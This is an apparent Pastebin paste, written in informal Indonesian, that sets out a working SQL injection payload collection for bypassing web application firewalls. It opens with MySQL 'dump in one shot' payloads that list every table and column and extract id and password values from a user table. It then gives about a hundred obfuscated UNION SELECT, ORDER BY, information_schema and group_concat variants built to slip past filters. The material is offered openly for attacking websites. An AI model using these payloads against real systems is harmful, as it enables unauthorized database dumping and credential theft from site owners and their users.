CHOKKAXPLOITER

Dios bypass waf 403 Forbidden

Jan 12th, 2021
266
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.37 KB | None | 0 0
  1. Nih dios yang gw pake
  2. Dios Waff 403 :
  3.  
  4. +/*!50000union*/+/*!50000select*/+
  5.  
  6. /*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!50000table_name*/,/*!50000column_name*/)),@)
  7.  
  8.  
  9.  
  10. /*!50000make_set*/(6,@:=0x0a,(select(1)/*!50000from*/(/*!50000tb_user*/)where@:=make_set(511,@,0x3c6c693e,/*!50000id*/,/*!50000password*/)),@),
  11.  
  12.  
  13. Sebenernya banyak yak gw kasih dah :
  14. [~] order by [~]
  15.  
  16. /**/ORDER/**/BY/**/
  17. /*!order*/+/*!by*/
  18. /*!ORDER BY*/
  19. /*!50000ORDER BY*/
  20. /*!50000ORDER*//**//*!50000BY*/
  21. /*!12345ORDER*/+/*!BY*/
  22.  
  23. [~] UNION select [~]
  24.  
  25. /*!50000%55nIoN*/ /*!50000%53eLeCt*/
  26. %55nion(%53elect 1,2,3)-- -
  27. +union+distinct+select+
  28. +union+distinctROW+select+
  29. /**//*!12345UNION SELECT*//**/
  30. /**//*!50000UNION SELECT*//**/
  31. /**/UNION/**//*!50000SELECT*//**/
  32. /*!50000UniON SeLeCt*/
  33. union /*!50000%53elect*/
  34. +#uNiOn+#sEleCt
  35. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  36. /*!%55NiOn*/ /*!%53eLEct*/
  37. /*!u%6eion*/ /*!se%6cect*/
  38. +un/**/ion+se/**/lect
  39. uni%0bon+se%0blect
  40. %2f**%2funion%2f**%2fselect
  41. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  42. REVERSE(noinu)+REVERSE(tceles)
  43. /*--*/union/*--*/select/*--*/
  44. union (/*!/**/ SeleCT */ 1,2,3)
  45. /*!union*/+/*!select*/
  46. union+/*!select*/
  47. /**/union/**/select/**/
  48. /**/uNIon/**/sEleCt/**/
  49. +%2F**/+Union/*!select*/
  50. /**//*!union*//**//*!select*//**/
  51. /*!uNIOn*/ /*!SelECt*/
  52. +union+distinct+select+
  53. +union+distinctROW+select+
  54. uNiOn aLl sElEcT
  55. UNIunionON+SELselectECT
  56. /**/union/*!50000select*//**/
  57. 0%a0union%a0select%09
  58. %0Aunion%0Aselect%0A
  59. %55nion/**/%53elect
  60. uni/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  61. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  62. %0A%09UNION%0CSELECT%10NULL%
  63. /*!union*//*--*//*!all*//*--*//*!select*/
  64. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  65. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  66. +UnIoN/*&a=*/SeLeCT/*&a=*/
  67. union+sel%0bect
  68. +uni*on+sel*ect+
  69. +#1q%0Aunion all#qa%0A#%0Aselect
  70. union(select (1),(2),(3),(4),(5))
  71. UNION(SELECT(column)FROM(table))
  72. %23xyz%0AUnIOn%23xyz%0ASeLecT+
  73. %23xyz%0A%55nIOn%23xyz%0A%53eLecT+
  74. union(select(1),2,3)
  75. union (select 1111,2222,3333)
  76. uNioN (/*!/**/ SeleCT */ 11)
  77. union (select 1111,2222,3333)
  78. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  79. /**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/
  80. %0A/**//*!50000%55nIOn*//*yoyu*/all/**/%0A/*!%53eLEct*/%0A/*nnaa*/
  81. +%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
  82. +union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  83. /*!f****U%0d%0aunion*/+/*!f****U%0d%0aSelEct*/
  84. +%23blobblobblob%0aUnIOn%23blobblobblob%0aSeLe cT+
  85. /*!blobblobblob%0d%0aunion*/+/*!blobblobblob%0d%0aSelEct*/
  86. /union\sselect/g
  87. /union\s+select/i
  88. /*!UnIoN*/SeLeCT
  89. +UnIoN/*&a=*/SeLeCT/*&a=*/
  90. +uni>on+sel>ect+
  91. +(UnIoN)+(SelECT)+
  92. +(UnI)(oN)+(SeL)(EcT)
  93. +’UnI”On’+'SeL”ECT’
  94. +uni on+sel ect+
  95. +/*!UnIoN*/+/*!SeLeCt*/+
  96. /*!u%6eion*/ /*!se%6cect*/
  97. uni%20union%20/*!select*/%20
  98. union%23aa%0Aselect
  99. /**/union/*!50000select*/
  100. /^.*union.*$/ /^.*select.*$/
  101. /*union*/union/*select*/select+
  102. /*uni X on*/union/*sel X ect*/
  103. +un/**/ion+sel/**/ect+
  104. +UnIOn%0d%0aSeleCt%0d%0a
  105. UNION/*&test=1*/SELECT/*&pwn=2*/
  106. un?+un/**/ion+se/**/lect+
  107. +UNunionION+SEselectLECT+
  108. +uni%0bon+se%0blect+
  109. %252f%252a*/union%252f%252a /select%252f%252a*/
  110. /%2A%2A/union/%2A%2A/select/%2A%2A/
  111. %2f**%2funion%2f**%2fselect%2f**%2f
  112. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  113. /*!UnIoN*/SeLecT+
  114.  
  115. [~] information_schema.tables [~]
  116.  
  117. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()-- -
  118. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like schEMA()-- -
  119. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=database()-- -
  120. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/ like database()-- -
  121. /*!FrOm*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  122. /*!FrOm*/+information_schema./**/columns+/*!12345Where*/+/*!%54able_name*/ like hex table
  123.  
  124. [~] concat() [~]
  125.  
  126. CoNcAt()
  127. concat()
  128. CON%08CAT()
  129. CoNcAt()
  130. %0AcOnCat()
  131. /**//*!12345cOnCat*/
  132. /*!50000cOnCat*/(/*!*/)
  133. unhex(hex(concat(table_name)))
  134. unhex(hex(/*!12345concat*/(table_name)))
  135. unhex(hex(/*!50000concat*/(table_name)))
  136.  
  137. [~] group_concat() [~]
  138.  
  139. /*!group_concat*/()
  140. gRoUp_cOnCAt()
  141. group_concat(/*!*/)
  142. group_concat(/*!12345table_name*/)
  143. group_concat(/*!50000table_name*/)
  144. /*!group_concat*/(/*!12345table_name*/)
  145. /*!group_concat*/(/*!50000table_name*/)
  146. /*!12345group_concat*/(/*!12345table_name*/)
  147. /*!50000group_concat*/(/*!50000table_name*/)
  148. /*!GrOuP_ConCaT*/()
  149. /*!12345GroUP_ConCat*/()
  150. /*!50000gRouP_cOnCaT*/()
  151. /*!50000Gr%6fuP_c%6fnCAT*/()
  152. unhex(hex(group_concat(table_name)))
  153. unhex(hex(/*!group_concat*/(/*!table_name*/)))
  154. unhex(hex(/*!12345group_concat*/(table_name)))
  155. unhex(hex(/*!12345group_concat*/(/*!table_name*/)))
  156. unhex(hex(/*!12345group_concat*/(/*!12345table_name*/)))
  157. unhex(hex(/*!50000group_concat*/(table_name)))
  158. unhex(hex(/*!50000group_concat*/(/*!table_name*/)))
  159. unhex(hex(/*!50000group_concat*/(/*!50000table_name*/)))
  160. convert(group_concat(table_name)+using+ascii)
  161. convert(group_concat(/*!table_name*/)+using+ascii)
  162. convert(group_concat(/*!12345table_name*/)+using+ascii)
  163. convert(group_concat(/*!50000table_name*/)+using+ascii)
  164. CONVERT(group_concat(table_name)+USING+latin1)
  165. CONVERT(group_concat(table_name)+USING+latin2)
  166. CONVERT(group_concat(table_name)+USING+latin3)
  167. CONVERT(group_concat(table_name)+USING+latin4)
  168. CONVERT(group_concat(table_name)+USING+latin5)
Add Comment
Please, Sign In to add comment